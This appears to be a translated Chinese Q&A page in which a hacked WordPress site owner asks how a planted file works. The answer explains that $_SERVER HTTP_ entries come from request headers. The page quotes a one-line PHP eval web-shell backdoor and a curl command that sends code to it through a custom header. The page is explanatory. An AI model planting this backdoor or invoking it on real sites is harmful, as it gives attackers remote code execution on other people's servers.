php - 黑客可以将参数传递给 $_SERVER 吗?
问题描述
所以我们的网站不幸被黑了。
他们在我们的 wp-admin 目录中创建了一个名为 wp-update.php 的文件,其中包含以下代码:
<?php @eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
我的问题是黑客如何使用 $_SERVER 传入他的脚本?
解决方案
$_SERVER
名称以 开头的超全局属性HTTP_
只是 HTTP 请求标头的表示。
由于请求标头完全由发出请求的人控制,因此在此处插入数据是微不足道的。
任何 HTTP 客户端都会让攻击者指定他们喜欢的任何标头。cURL 的命令行客户端中的示例如下所示:
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php
推荐阅读
- swift - 将 createColdObservable 用于 RxTest 时 XCTAssertEqual 失败
- python - 在熊猫数据框中附加一个系列作为列
- c# - 如何使用 LINQ 更新数据库
- spring - Cron 表达式无法按预期用于 Spring Boot
- java - Listview 在 Activity 上不可见
- c++ - 行为/Win32/执行
- r - 来自 3 维数据框的堆积条形图
- databricks - 设置 Databricks 连接
- python - 启动弹出窗口以在 sale.order.line 视图中选择某种类型的产品
- ios - NSFileManager startDownloadingUbiquitousItemAtURL 在 iOS14 上无法正常工作